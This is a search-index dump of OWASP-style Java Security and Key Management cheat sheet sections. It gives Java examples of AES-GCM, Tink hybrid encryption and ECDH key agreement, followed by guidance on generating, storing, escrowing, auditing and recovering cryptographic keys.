import static java.nio.charset.StandardCharsets.UTF_8;\n\nimport com.google.crypto.tink.Aead;\nimport com.google.crypto.tink.InsecureSecretKeyAccess;\nimport com.google.crypto.tink.KeysetHandle;\nimport com.google.crypto.tink.TinkJsonProtoKeysetFormat;\nimport com.google.crypto.tink.aead.AeadConfig;\nimport java.nio.file.Files;\nimport java.nio.file.Path;\nimport java.nio.file.Paths;\nimport java.util.Base64;\n\n// AesGcmSimpleTest\npublic class App {\n\n// Based on example from:\n// https://github.com/tink-crypto/tink-java/tree/main/examples/aead\n\npublic static void main(String[] args) throws Exception {\n\n// Key securely generated using:\n// tinkey create-keyset --key-template AES128_GCM --out-format JSON --out aead_test_keyset.json\n\n\n\n// Register all AEAD key types with the Tink runtime.\nAeadConfig.register();\n\n// Read the keyset into a KeysetHandle.\nKeysetHandle handle =\nTinkJsonProtoKeysetFormat.parseKeyset(\nnew String(Files.readAllBytes( Paths.get(\"/home/fredbloggs/aead_test_keyset.json\")), UTF_8), InsecureSecretKeyAccess.get());\n\nString message = \"This message to be encrypted\";\nSystem.out.println(message);\n\n// Add some relevant context about the encrypted data that should be verified\n// on decryption\nString metadata = \"Sender: fredbloggs@example.com\";\n\n// Encrypt the message\nbyte[] cipherText = AesGcmSimple.encrypt(message, metadata, handle);\nSystem.out.println(Base64.getEncoder().encodeToString(cipherText));\n\n// Decrypt the message\nString message2 = AesGcmSimple.decrypt(cipherText, metadata, handle);\nSystem.out.println(message2);\n}\n}\n\nclass AesGcmSimple {\n\npublic static byte[] encrypt(String plaintext, String metadata, KeysetHandle handle) throws Exception {\n// Get the primitive.\nAead aead = handle.getPrimitive(Aead.class);\nreturn aead.encrypt(plaintext.getBytes(UTF_8), metadata.getBytes(UTF_8));\n}\n\npublic static String decrypt(byte[] ciphertext, String metadata, KeysetHandle handle) throws Exception {\n// Get the primitive.\nAead aead = handle.getPrimitive(Aead.class);\nreturn new String(aead.decrypt(ciphertext, metadata.getBytes(UTF_8)),UTF_8);\n}\n\n}\n
"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#symmetric-example-using-built-in-jcajce-classes","title":"Symmetric example using built-in JCA/JCE classes","text":"

If you absolutely cannot use a separate library, it is still possible to use the built-in JCA/JCE classes, but it is strongly recommended to have a cryptography expert review the full design and code, as even the most trivial error can severely weaken your encryption.

The following code snippet shows an example of using AES-GCM to perform encryption/decryption of data.

A few constraints/pitfalls with this code:

Click here to view the \"JCA/JCE symmetric encryption\" code snippet.
import java.nio.charset.StandardCharsets;\nimport java.security.SecureRandom;\nimport javax.crypto.spec.*;\nimport javax.crypto.*;\nimport java.util.Base64;\n\n\n// AesGcmSimpleTest\nclass Main {\n\npublic static void main(String[] args) throws Exception {\n// Key of 32 bytes / 256 bits for AES\nKeyGenerator keyGen = KeyGenerator.getInstance(AesGcmSimple.ALGORITHM);\nkeyGen.init(AesGcmSimple.KEY_SIZE, new SecureRandom());\nSecretKey secretKey = keyGen.generateKey();\n\n// Nonce of 12 bytes / 96 bits and this size should always be used.\n// It is critical for AES-GCM that a unique nonce is used for every cryptographic operation.\nbyte[] nonce = new byte[AesGcmSimple.IV_LENGTH];\nSecureRandom random = new SecureRandom();\nrandom.nextBytes(nonce);\n\nvar message = \"This message to be encrypted\";\nSystem.out.println(message);\n\n// Encrypt the message\nbyte[] cipherText = AesGcmSimple.encrypt(message, nonce, secretKey);\nSystem.out.println(Base64.getEncoder().encodeToString(cipherText));\n\n// Decrypt the message\nvar message2 = AesGcmSimple.decrypt(cipherText, nonce, secretKey);\nSystem.out.println(message2);\n}\n}\n\nclass AesGcmSimple {\n\npublic static final String ALGORITHM = \"AES\";\npublic static final String CIPHER_ALGORITHM = \"AES/GCM/NoPadding\";\npublic static final int KEY_SIZE = 256;\npublic static final int TAG_LENGTH = 128;\npublic static final int IV_LENGTH = 12;\n\npublic static byte[] encrypt(String plaintext, byte[] nonce, SecretKey secretKey) throws Exception {\nreturn cryptoOperation(plaintext.getBytes(StandardCharsets.UTF_8), nonce, secretKey, Cipher.ENCRYPT_MODE);\n}\n\npublic static String decrypt(byte[] ciphertext, byte[] nonce, SecretKey secretKey) throws Exception {\nreturn new String(cryptoOperation(ciphertext, nonce, secretKey, Cipher.DECRYPT_MODE), StandardCharsets.UTF_8);\n}\n\nprivate static byte[] cryptoOperation(byte[] text, byte[] nonce, SecretKey secretKey, int mode) throws Exception {\nCipher cipher = Cipher.getInstance(CIPHER_ALGORITHM);\nGCMParameterSpec gcmParameterSpec = new GCMParameterSpec(TAG_LENGTH, nonce);\ncipher.init(mode, secretKey, gcmParameterSpec);\nreturn cipher.doFinal(text);\n}\n\n}\n
"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#encryption-for-transmission","title":"Encryption for transmission","text":"

Again, follow the algorithm guidance in the OWASP Cryptographic Storage Cheat Sheet.

"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#asymmetric-example-using-google-tink","title":"Asymmetric example using Google Tink","text":"

Google Tink has documentation on performing common tasks.

For example, this page (from Google's website) shows how to perform a hybrid encryption process where two parties want to share data based on their asymmetric key pair.

The following code snippet shows how this functionality can be used to share secrets between Alice and Bob:

Click here to view the \"Tink hybrid encryption\" code snippet.
import static java.nio.charset.StandardCharsets.UTF_8;\n\nimport com.google.crypto.tink.HybridDecrypt;\nimport com.google.crypto.tink.HybridEncrypt;\nimport com.google.crypto.tink.InsecureSecretKeyAccess;\nimport com.google.crypto.tink.KeysetHandle;\nimport com.google.crypto.tink.TinkJsonProtoKeysetFormat;\nimport com.google.crypto.tink.hybrid.HybridConfig;\nimport java.nio.file.Files;\nimport java.nio.file.Path;\nimport java.nio.file.Paths;\nimport java.util.Base64;\n\n// HybridReplaceTest\nclass App {\npublic static void main(String[] args) throws Exception {\n/*\n\n        Generated public/private keypairs for Bob and Alice using the\n        following tinkey commands:\n\n        ./tinkey create-keyset \\\n        --key-template DHKEM_X25519_HKDF_SHA256_HKDF_SHA256_AES_256_GCM \\\n        --out-format JSON --out alice_private_keyset.json\n\n        ./tinkey create-keyset \\\n        --key-template DHKEM_X25519_HKDF_SHA256_HKDF_SHA256_AES_256_GCM \\\n        --out-format JSON --out bob_private_keyset.json\n\n        ./tinkey create-public-keyset --in alice_private_keyset.json \\\n        --in-format JSON --out-format JSON --out alice_public_keyset.json\n\n        ./tinkey create-public-keyset --in bob_private_keyset.json \\\n        --in-format JSON --out-format JSON --out bob_public_keyset.json\n        */\n\nHybridConfig.register();\n\n// Generate ECC key pair for Alice\nvar alice = new HybridSimple(\ngetKeysetHandle(\"/home/alicesmith/private_keyset.json\"),\ngetKeysetHandle(\"/home/alicesmith/public_keyset.json\")\n\n);\n\nKeysetHandle alicePublicKey = alice.getPublicKey();\n\n// Generate ECC key pair for Bob\nvar bob = new HybridSimple(\ngetKeysetHandle(\"/home/bobjones/private_keyset.json\"),\ngetKeysetHandle(\"/home/bobjones/public_keyset.json\")\n\n);\n\nKeysetHandle bobPublicKey = bob.getPublicKey();\n\n// This keypair generation shoud be reperformed every so often in order to\n// obtain a new shared secret to avoid a long lived shared secret.\n\n// Alice encrypts a message to send to Bob\nString plaintext = \"Hello, Bob!\";\n\n// Add some relevant context about the encrypted data that should be verified\n// on decryption\nString metadata = \"Sender: alicesmith@example.com\";\n\nSystem.out.println(\"Secret being sent from Alice to Bob: \" + plaintext);\nvar cipherText = alice.encrypt(bobPublicKey, plaintext, metadata);\nSystem.out.println(\"Ciphertext being sent from Alice to Bob: \" + Base64.getEncoder().encodeToString(cipherText));\n\n\n// Bob decrypts the message\nvar decrypted = bob.decrypt(cipherText, metadata);\nSystem.out.println(\"Secret received by Bob from Alice: \" + decrypted);\nSystem.out.println();\n\n// Bob encrypts a message to send to Alice\nString plaintext2 = \"Hello, Alice!\";\n\n// Add some relevant context about the encrypted data that should be verified\n// on decryption\nString metadata2 = \"Sender: bobjones@example.com\";\n\nSystem.out.println(\"Secret being sent from Bob to Alice: \" + plaintext2);\nvar cipherText2 = bob.encrypt(alicePublicKey, plaintext2, metadata2);\nSystem.out.println(\"Ciphertext being sent from Bob to Alice: \" + Base64.getEncoder().encodeToString(cipherText2));\n\n// Bob decrypts the message\nvar decrypted2 = alice.decrypt(cipherText2, metadata2);\nSystem.out.println(\"Secret received by Alice from Bob: \" + decrypted2);\n}\n\nprivate static KeysetHandle getKeysetHandle(String filename) throws Exception\n{\nreturn TinkJsonProtoKeysetFormat.parseKeyset(\nnew String(Files.readAllBytes( Paths.get(filename)), UTF_8), 
InsecureSecretKeyAccess.get());\n}\n}\nclass HybridSimple {\n\nprivate KeysetHandle privateKey;\nprivate KeysetHandle publicKey;\n\n\npublic HybridSimple(KeysetHandle privateKeyIn, KeysetHandle publicKeyIn) throws Exception {\nprivateKey = privateKeyIn;\npublicKey = publicKeyIn;\n}\n\npublic KeysetHandle getPublicKey() {\nreturn publicKey;\n}\n\npublic byte[] encrypt(KeysetHandle partnerPublicKey, String message, String metadata) throws Exception {\n\nHybridEncrypt encryptor = partnerPublicKey.getPrimitive(HybridEncrypt.class);\n\n// return the encrypted value\nreturn encryptor.encrypt(message.getBytes(UTF_8), metadata.getBytes(UTF_8));\n}\npublic String decrypt(byte[] ciphertext, String metadata) throws Exception {\n\nHybridDecrypt decryptor = privateKey.getPrimitive(HybridDecrypt.class);\n\n// return the encrypted value\nreturn new String(decryptor.decrypt(ciphertext, metadata.getBytes(UTF_8)),UTF_8);\n}\n\n\n}\n
"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#asymmetric-example-using-built-in-jcajce-classes","title":"Asymmetric example using built-in JCA/JCE classes","text":"

If you absolutely cannot use a separate library, it is still possible to use the built-in JCA/JCE classes, but it is strongly recommended to have a cryptography expert review the full design and code, as even the most trivial error can severely weaken your encryption.

The following code snippet shows an example of using Elliptic Curve Diffie-Hellman (ECDH) together with AES-GCM to perform encryption/decryption of data between two different sides without the need to transfer the symmetric key between the two sides. Instead, the sides exchange public keys and can then use ECDH to generate a shared secret which can be used for the symmetric encryption.

Note that this code sample relies on the AesGcmSimple class from the previous section.

A few constraints/pitfalls with this code:

Click here to view the \"JCA/JCE hybrid encryption\" code snippet.
import java.nio.charset.StandardCharsets;\nimport java.security.SecureRandom;\nimport javax.crypto.spec.*;\nimport javax.crypto.*;\nimport java.util.*;\nimport java.security.*;\nimport java.security.spec.*;\nimport java.util.Arrays;\n\n// ECDHSimpleTest\nclass Main {\npublic static void main(String[] args) throws Exception {\n\n// Generate ECC key pair for Alice\nvar alice = new ECDHSimple();\nKey alicePublicKey = alice.getPublicKey();\n\n// Generate ECC key pair for Bob\nvar bob = new ECDHSimple();\nKey bobPublicKey = bob.getPublicKey();\n\n// This keypair generation shoud be reperformed every so often in order to \n// obtain a new shared secret to avoid a long lived shared secret.\n\n// Alice encrypts a message to send to Bob\nString plaintext = \"Hello\"; //, Bob!\";\nSystem.out.println(\"Secret being sent from Alice to Bob: \" + plaintext);\n\nvar retPair = alice.encrypt(bobPublicKey, plaintext);\nvar nonce = retPair.getKey();\nvar cipherText = retPair.getValue();\n\nSystem.out.println(\"Both cipherText and nonce being sent from Alice to Bob: \" + Base64.getEncoder().encodeToString(cipherText) + \" \" + Base64.getEncoder().encodeToString(nonce));\n\n\n// Bob decrypts the message\nvar decrypted = bob.decrypt(alicePublicKey, cipherText, nonce);\nSystem.out.println(\"Secret received by Bob from Alice: \" + decrypted);\nSystem.out.println();\n\n// Bob encrypts a message to send to Alice\nString plaintext2 = \"Hello\"; //, Alice!\";\nSystem.out.println(\"Secret being sent from Bob to Alice: \" + plaintext2);\n\nvar retPair2 = bob.encrypt(alicePublicKey, plaintext2);\nvar nonce2 = retPair2.getKey();\nvar cipherText2 = retPair2.getValue();\nSystem.out.println(\"Both cipherText2 and nonce2 being sent from Bob to Alice: \" + Base64.getEncoder().encodeToString(cipherText2) + \" \" + Base64.getEncoder().encodeToString(nonce2));\n\n// Bob decrypts the message\nvar decrypted2 = alice.decrypt(bobPublicKey, cipherText2, nonce2);\nSystem.out.println(\"Secret received by Alice from Bob: \" + decrypted2);\n}\n}\nclass ECDHSimple {\nprivate KeyPair keyPair;\n\npublic class AesKeyNonce {\npublic SecretKey Key;\npublic byte[] Nonce;\n}\n\npublic ECDHSimple() throws Exception {\nKeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance(\"EC\");\nECGenParameterSpec ecSpec = new ECGenParameterSpec(\"secp256r1\"); // Using secp256r1 curve\nkeyPairGenerator.initialize(ecSpec);\nkeyPair = keyPairGenerator.generateKeyPair();\n}\n\npublic Key getPublicKey() {\nreturn keyPair.getPublic();\n}\n\npublic AbstractMap.SimpleEntry<byte[], byte[]> encrypt(Key partnerPublicKey, String message) throws Exception {\n\n// Generate the AES Key and Nonce\nAesKeyNonce aesParams = generateAESParams(partnerPublicKey);\n\n// return the encrypted value\nreturn new AbstractMap.SimpleEntry<>(\naesParams.Nonce,\nAesGcmSimple.encrypt(message, aesParams.Nonce, aesParams.Key)\n);\n}\npublic String decrypt(Key partnerPublicKey, byte[] ciphertext, byte[] nonce) throws Exception {\n\n// Generate the AES Key and Nonce\nAesKeyNonce aesParams = generateAESParams(partnerPublicKey, nonce);\n\n// return the decrypted value\nreturn AesGcmSimple.decrypt(ciphertext, aesParams.Nonce, aesParams.Key);\n}\n\nprivate AesKeyNonce generateAESParams(Key partnerPublicKey, byte[] nonce) throws Exception {\n\n// Derive the secret based on this side's private key and the other side's public key \nKeyAgreement keyAgreement = KeyAgreement.getInstance(\"ECDH\");\nkeyAgreement.init(keyPair.getPrivate());\nkeyAgreement.doPhase(partnerPublicKey, true);\nbyte[] 
secret = keyAgreement.generateSecret();\n\nAesKeyNonce aesKeyNonce = new AesKeyNonce();\n\n// Copy first 32 bytes as the key\nbyte[] key = Arrays.copyOfRange(secret, 0, (AesGcmSimple.KEY_SIZE / 8));\naesKeyNonce.Key = new SecretKeySpec(key, 0, key.length, \"AES\");\n\n// Passed in nonce will be used.\naesKeyNonce.Nonce = nonce;\nreturn aesKeyNonce;\n\n}\n\nprivate AesKeyNonce generateAESParams(Key partnerPublicKey) throws Exception {\n\n// Nonce of 12 bytes / 96 bits and this size should always be used.\n// It is critical for AES-GCM that a unique nonce is used for every cryptographic operation.\n// Therefore this is not generated from the shared secret\nbyte[] nonce = new byte[AesGcmSimple.IV_LENGTH];\nSecureRandom random = new SecureRandom();\nrandom.nextBytes(nonce);\nreturn generateAESParams(partnerPublicKey, nonce);\n\n}\n}\n
"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html","title":"Key Management Cheat Sheet","text":""},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This Key Management Cheat Sheet provides developers with guidance for implementation of cryptographic key management within an application in a secure manner. It is important to document and harmonize rules and practices for:

  1. key life cycle management (generation, distribution, destruction)
  2. key compromise, recovery and zeroization
  3. key storage
  4. key agreement
"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#general-guidelines-and-considerations","title":"General Guidelines and Considerations","text":"

Formulate a plan for the overall organization's cryptographic strategy to guide developers working on different applications and ensure that each application's cryptographic capability meets minimum requirements and best practices.

Identify the cryptographic and key management requirements for your application and map all components that process or store cryptographic key material.

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#key-selection","title":"Key Selection","text":"

Selection of the cryptographic and key management algorithms to use within a given application should begin with an understanding of the objectives of the application.

For example, if the application is required to store data securely, then the developer should select an algorithm suite that supports the objective of data-at-rest protection. Applications that are required to transmit and receive data would select an algorithm suite that supports the objective of data-in-transit protection.

We have provided recommendations on the selection of crypto suites within an application based on application and security objectives. Application developers oftentimes begin the development of crypto and key management capabilities by examining what is available in a library.

However, an analysis of the real needs of the application should be conducted to determine the optimal key management approach. Begin by understanding the security objectives of the application which will then drive the selection of cryptographic protocols that are best suited. For example, the application may require:

  1. Confidentiality of data at rest and confidentiality of data in transit.
  2. Authenticity of the end device.
  3. Authenticity of data origin.
  4. Integrity of data in transit.
  5. Keys to create the data encryption keys.

Once the understanding of the security needs of the application is achieved, developers can determine what protocols and algorithms are required. Once the protocols and algorithms are understood, you can begin to define the different types of keys that will support the application's objectives.

There are a diverse set of key types and certificates to consider, for example:

  1. Encryption: Symmetric encryption keys, Asymmetric encryption keys (public and private).
  2. Authentication of End Devices: Pre-shared symmetric keys, Trusted certificates, Trust Anchors.
  3. Data Origin Authentication: HMAC.
  4. Integrity Protection: Message Authentication Codes (MACs).
  5. Key Encryption Keys.
"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#algorithms-and-protocols","title":"Algorithms and Protocols","text":"

According to NIST SP 800-57 Part 1, many algorithms and schemes that provide a security service use a hash function as a component of the algorithm.

Hash functions can be found in digital signature algorithms (FIPS186), Keyed-Hash Message Authentication Codes (HMAC) (FIPS198), key-derivation functions/methods (NIST Special Publications (SP) 800-56A, 800-56B, 800-56C and 800-108), and random number generators (NIST SP 800-90A). Approved hash functions are defined in FIPS180.

NIST SP 800-57 Part 1 recognizes three basic classes of approved cryptographic algorithms: hash functions, symmetric-key algorithms and asymmetric-key algorithms. The classes are defined by the number of cryptographic keys that are used in conjunction with the algorithm.

The NSA released a report, Commercial National Security Algorithm Suite 2.0, which lists the cryptographic algorithms that are expected to remain strong even with advances in quantum computing.

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#cryptographic-hash-functions","title":"Cryptographic hash functions","text":"

Cryptographic hash functions do not require keys. Hash functions generate a relatively small digest (hash value) from a (possibly) large input in a way that is fundamentally difficult to reverse (i.e., it is hard to find an input that will produce a given output). Hash functions are used as building blocks for key management, for example,

  1. To provide data authentication and integrity services (Section 4.2.3) \u2013 the hash function is used with a key to generate a message authentication code.
  2. To compress messages for digital signature generation and verification (Section 4.2.4).
  3. To derive keys in key-establishment algorithms (Section 4.2.5).
  4. To generate deterministic random numbers (Section 4.2.7).
"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#symmetric-key-algorithms","title":"Symmetric-key algorithms","text":"

Symmetric-key algorithms (sometimes known as secret-key algorithms) transform data in a way that is fundamentally difficult to undo without knowledge of a secret key. The key is \"symmetric\" because the same key is used for a cryptographic operation and its inverse (e.g., encryption and decryption).

Symmetric keys are often known by more than one entity; however, the key shall not be disclosed to entities that are not authorized access to the data protected by that algorithm and key. Symmetric key algorithms are used, for example,

  1. To provide data confidentiality (Section 4.2.2); the same key is used to encrypt and decrypt data.
  2. To provide authentication and integrity services (Section 4.2.3) in the form of Message Authentication Codes (MACs); the same key is used to generate the MAC and to validate it. MACs normally employ either a symmetric key-encryption algorithm or a cryptographic hash function as their cryptographic primitive.
  3. As part of the key-establishment process (Section 4.2.5).
  4. To generate deterministic random numbers (Section 4.2.7).
"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#asymmetric-key-algorithms","title":"Asymmetric-key algorithms","text":"

Asymmetric-key algorithms, commonly known as public-key algorithms, use two related keys (i.e., a key pair) to perform their functions: a public key and a private key. The public key may be known by anyone; the private key should be under the sole control of the entity that \"owns\" the key pair. Even though the public and private keys of a key pair are related, knowledge of the public key does not reveal the private key. Asymmetric algorithms are used, for example,

  1. To compute digital signatures (Section 4.2.4).
  2. To establish cryptographic keying material (Section 4.2.5).
  3. To generate random numbers (Section 4.2.7).
"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#message-authentication-codes-macs","title":"Message Authentication Codes (MACs)","text":"

Message Authentication Codes (MACs) provide data authentication and integrity. A MAC is a cryptographic checksum on the data that is used in order to provide assurance that the data has not changed and that the MAC was computed by the expected entity.

Although message integrity is often provided using non-cryptographic techniques known as error detection codes, these codes can be altered by an adversary to effect an action to the adversary's benefit. The use of an approved cryptographic mechanism, such as a MAC, can alleviate this problem.

In addition, the MAC can provide a recipient with assurance that the originator of the data is a key holder (i.e., an entity authorized to have the key). MACs are often used to authenticate the originator to the recipient when only those two parties share the MAC key.

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#digital-signatures","title":"Digital Signatures","text":"

Digital signatures are used to provide authentication, integrity and non-repudiation. Digital signatures are used in conjunction with hash functions and are computed on data of any length (up to a limit that is determined by the hash function).

FIPS186 specifies algorithms that are approved for the computation of digital signatures.

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#key-encryption-keys","title":"Key Encryption Keys","text":"

Symmetric key-wrapping keys are used to encrypt other keys using symmetric-key algorithms. Key-wrapping keys are also known as key encrypting keys.
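
As a minimal illustrative sketch (not taken from the cheat sheet itself, and assuming a JCE provider that supports the standard \"AESWrap\" transformation), wrapping a data-encryption key with a key-encryption key of equal strength might look like the following:

import javax.crypto.Cipher;\nimport javax.crypto.KeyGenerator;\nimport javax.crypto.SecretKey;\n\n// Illustrative only: wrap a data-encryption key (DEK) with a 256-bit key-encryption key (KEK)\n// using AES Key Wrap (RFC 3394) via the \"AESWrap\" transformation.\nclass KeyWrapExample {\npublic static void main(String[] args) throws Exception {\nKeyGenerator keyGen = KeyGenerator.getInstance(\"AES\");\nkeyGen.init(256);\nSecretKey kek = keyGen.generateKey(); // key-encryption key (ideally generated and held in an HSM)\nSecretKey dek = keyGen.generateKey(); // data-encryption key to be stored or distributed\n\nCipher cipher = Cipher.getInstance(\"AESWrap\");\ncipher.init(Cipher.WRAP_MODE, kek);\nbyte[] wrappedDek = cipher.wrap(dek); // the wrapped key is safe to persist or transport\n\ncipher.init(Cipher.UNWRAP_MODE, kek);\nSecretKey recoveredDek = (SecretKey) cipher.unwrap(wrappedDek, \"AES\", Cipher.SECRET_KEY); // recovers the original DEK\n}\n}\n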

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#key-strength","title":"Key Strength","text":"

Review NIST SP 800-57 (Recommendation for Key Management) for recommended guidelines on key strength for specific algorithm implementations. Also, consider these best practices:

  1. Establish what the application's minimum computational resistance to attack should be. Understanding the minimum computational resistance to attack should take into consideration the sophistication of your adversaries, how long data needs to be protected, where data is stored and if it is exposed. Identifying the computational resistance to attack will inform engineers as to the minimum length of the cryptographic key required to protect data over the life of that data. Consult NIST SP 800-131a for additional guidance on determining the appropriate key lengths for the algorithm of choice.
  2. When encrypting keys for storage or distribution, always encrypt a cryptographic key with another key of equal or greater cryptographic strength.
  3. When moving to Elliptic Curve-based algorithms, choose a key length that meets or exceeds the comparative strength of other algorithms in use within your system. Refer to NIST SP 800-57 Table 2.
  4. Formulate an overall cryptographic strategy for the organization to guide developers working on different applications and ensure that each application's cryptographic capability meets minimum requirements and best practices.
"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#memory-management-considerations","title":"Memory Management Considerations","text":"

Keys stored in memory for a long time can become \"burned in\". This can be mitigated by splitting the key into components that are frequently updated (see NIST SP 800-57).

Plan for the loss or corruption of the memory media on which keys and/or certificates are stored, and for their recovery, according to NIST SP 800-57.

Plan for the recovery from possible corruption of the memory media necessary for key or certificate generation, registration, and/or distribution systems, subsystems, or components, as recommended in NIST SP 800-57.

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#perfect-forward-secrecy","title":"Perfect Forward Secrecy","text":"

Ephemeral keys can provide perfect forward secrecy protection, which means a compromise of the server's long-term signing key does not compromise the confidentiality of past sessions. Refer to the TLS Cheat Sheet.

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#key-usage","title":"Key Usage","text":"

According to NIST, in general, a single key should be used for only one purpose (e.g., encryption, authentication, key wrapping, random number generation, or digital signatures).

There are several reasons for this:

  1. The use of the same key for two different cryptographic processes may weaken the security provided by one or both of the processes.
  2. Limiting the use of a key limits the damage that could be done if the key is compromised.
  3. Some uses of keys interfere with each other. For example, the length of time a key is required may differ for each use and purpose, and retention requirements of the data may differ for different data types.
"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#cryptographic-module-topics","title":"Cryptographic Module Topics","text":"

According to NIST SP800-133, cryptographic modules are the set of hardware, software, and/or firmware that implements security functions (including cryptographic algorithms and key generation) and is contained within a cryptographic module boundary to provide protection of the keys.

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#key-management-lifecycle-best-practices","title":"Key Management Lifecycle Best Practices","text":""},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#generation","title":"Generation","text":"

Cryptographic keys shall be generated within a cryptographic module that is at least FIPS 140-2 compliant. For explanatory purposes, consider the cryptographic module in which a key is generated to be the key-generating module.

Any random value required by the key-generating module shall be generated within that module; that is, the Random Bit Generator that generates the random value shall be implemented within the at least FIPS 140-2 compliant cryptographic module that generates the key.

Hardware cryptographic modules are preferred over software cryptographic modules for protection.

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#distribution","title":"Distribution","text":"

The generated keys shall be transported (when necessary) using secure channels and shall be used by their associated cryptographic algorithm within at least FIPS 140-2 compliant cryptographic modules. For additional detail on the recommendations in this section, refer to NIST Special Publication 800-133.

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#storage","title":"Storage","text":"
  1. Developers must understand where cryptographic keys are stored within the application. Understand what memory devices the keys are stored on.
  2. Keys must be protected on both volatile and persistent memory, ideally processed within secure cryptographic modules.
  3. Keys should never be stored in plaintext format.
  4. Ensure all keys are stored in a cryptographic vault, such as a hardware security module (HSM) or isolated cryptographic service.
  5. If you are planning on storing keys in offline devices/databases, then encrypt the keys using Key Encryption Keys (KEKs) prior to the export of the key material. The KEK length (and algorithm) should be equivalent to or greater in strength than the keys being protected.
  6. Ensure that keys have integrity protections applied while in storage (consider dual-purpose algorithms that support encryption and Message Authentication Codes (MACs)).
  7. Ensure that standard application-level code never reads or uses cryptographic keys directly; use key management libraries instead.
  8. Ensure that key handling and cryptographic operations are done inside the sealed vault.
  9. All work should be done in the vault (such as key access, encryption, decryption, signing, etc.).
"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#escrow-and-backup","title":"Escrow and Backup","text":"

Data that has been encrypted with lost cryptographic keys will never be recovered. Therefore, it is essential that the application incorporate a secure key backup capability, especially for applications that support data at rest encryption for long-term data stores.

When backing up keys, ensure that the database that is used to store the keys is encrypted using at least a FIPS 140-2 validated module. It is sometimes useful to escrow key material for use in investigations and for re-provisioning of key material to users in the event that the key is lost or corrupted.

Never escrow keys used for performing digital signatures, but consider the need to escrow keys that support encryption. Oftentimes, escrow can be performed by the Certificate Authority (CA) or key management system that provisions certificates and keys; however, in some instances separate APIs must be implemented to allow the system to perform the escrow for the application.

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#accountability-and-audit","title":"Accountability and Audit","text":"

Accountability involves the identification of those that have access to, or control of, cryptographic keys throughout their lifecycles. Accountability can be an effective tool to help prevent key compromises and to reduce the impact of compromises once they are detected.

Although it is preferred that no humans are able to view keys, as a minimum, the key management system should account for all individuals who are able to view plaintext cryptographic keys.

In addition, more sophisticated key-management systems may account for all individuals authorized to access or control any cryptographic keys, whether in plaintext or ciphertext form.

Accountability provides three significant advantages:

  1. It aids in the determination of when the compromise could have occurred and what individuals could have been involved.
  2. It tends to protect against compromise, because individuals with access to the key know that their access to the key is known.
  3. It is very useful in recovering from a detected key compromise to know where the key was used and what data or other keys were protected by the compromised key.

Certain principles have been found to be useful in enforcing the accountability of cryptographic keys. These principles might not apply to all systems or all types of keys.

Some of the principles that apply to long-term keys controlled by humans include:

  1. Uniquely identifying keys.
  2. Identifying the key user.
  3. Identifying the dates and times of key use, along with the data that is protected.
  4. Identifying other keys that are protected by a symmetric or private key.

Two types of audit should be performed on key management systems:

  1. The security plan and the procedures that are developed to support the plan should be periodically audited to ensure that they continue to support the Key Management Policy (NIST SP 800-57 Part 2).
  2. The protective mechanisms employed should be periodically reassessed with respect to the level of security that they provide and are expected to provide in the future, and that the mechanisms correctly and effectively support the appropriate policies.

New technology developments and attacks should be taken into consideration. On a more frequent basis, the actions of the humans that use, operate and maintain the system should be reviewed to verify that the humans continue to follow established security procedures.

Strong cryptographic systems can be compromised by lax and inappropriate human actions. Highly unusual events should be noted and reviewed as possible indicators of attempted attacks on the system.

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#key-compromise-and-recovery","title":"Key Compromise and Recovery","text":"

The compromise of a key has the following implications:

  1. In general, the unauthorized disclosure of a key used to provide confidentiality protection (i.e., via encryption) means that all information encrypted by that key could be exposed or known by unauthorized entities. The disclosure of a Certificate Authority's private signature key means that an adversary can create fraudulent certificates and Certificate Revocation Lists (CRLs).
  2. A compromise of the integrity of a key means that the key is incorrect - either that the key has been modified (either deliberately or accidentally), or that another key has been substituted; this includes a deletion (non-availability) of the key. The substitution or modification of a key used to provide integrity calls into question the integrity of all information protected by the key. This information could have been provided by, or changed by, an unauthorized entity that knows the key. The substitution of a public or secret key that will be used (at a later time) to encrypt data could allow an unauthorized entity (who knows the decryption key) to decrypt data that was encrypted using the encryption key.
  3. A compromise of a key's usage or application association means that the key could be used for the wrong purpose (e.g., for key establishment instead of digital signatures) or for the wrong application, and could result in the compromise of information protected by the key.
  4. A compromise of a key's association with the owner or other entity means that the identity of the other entity cannot be assured (i.e., one does not know who the other entity really is) or that information cannot be processed correctly (e.g., decrypted with the correct key).
  5. A compromise of a key's association with other information means that there is no association at all, or the association is with the wrong \"information\". This could cause the cryptographic services to fail, information to be lost, or the security of the information to be compromised. Certain protective measures may be taken in order to minimize the likelihood or consequences of a key compromise. The effect is similar to ransomware, except that you cannot pay the ransom to get the key back.

The following procedures are usually involved:

  1. Limiting the amount of time a symmetric or private key is in plaintext form.
  2. Preventing humans from viewing plaintext symmetric and private keys.
  3. Restricting plaintext symmetric and private keys to physically protected containers. This includes key generators, key-transport devices, key loaders, cryptographic modules, and key-storage devices.
  4. Using integrity checks to ensure that the integrity of a key or its association with other data has not been compromised. For example, keys may be wrapped (i.e., encrypted) in such a manner that unauthorized modifications to the wrapping or to the associations will be detected.
